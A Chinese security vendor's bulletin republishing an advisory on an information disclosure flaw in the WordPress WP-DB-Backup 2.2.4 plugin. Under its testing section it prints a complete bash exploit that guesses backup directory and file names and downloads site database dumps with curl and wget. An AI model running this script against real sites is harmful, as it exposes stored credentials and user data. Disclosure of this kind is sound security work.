当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WordPress WP-DB-Backup插件\'wp-db-backup.php\'远程信息泄露漏洞

     发表日期:2014-11-24 16:33:09

WordPress WP-DB-Backup插件\'wp-db-backup.php\'远程信息泄露漏洞

BugTraq-ID:71177

发布日期:2014-11-19

更新日期:2014-11-21

受影响系统:

WordPress WP-DB-Backup 2.2.4

WordPress WP-DB-Backup

详细信息:

WP-DB-Backup插件可以备份核心WordPress数据库表。 WP-DB-Backup 2.2.4及其他版本在实现上存在远程信息泄露漏洞,远程攻击者可利用此漏洞获取敏感信息。

来源:

Larry Cashdollar

测试方法:

警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/bin/bash #Larry W. Cashdollar, @_larry0 #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #Usage: Compile raintable.c #gcc raintable.c -o table;./table > rainbow #run ./exp targetsite date #date is in format YYYYMMDD e.g 20141031 if [ ! -e found.txt ]; then Z=0 K=`wc -l rainbow|awk \'{print $1}\'`; echo "[+] Searching...."; for x in `cat rainbow`; do CPATH="http://$1/wp-content/backup-$x/"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo $x > found.txt exit; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=6;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done else x=`cat found.txt`; fi # Now that we have the directory lets try to locate the database backup file. K=999; for y in `seq -w 0 999`; do CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Database backup $CPATH Found"; echo "[+] Received $RESULT"; wget $CPATH exit; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=2;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done

解决办法:

厂商补丁:

WordPress

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://wordpress.org/plugins/wp-db-backup/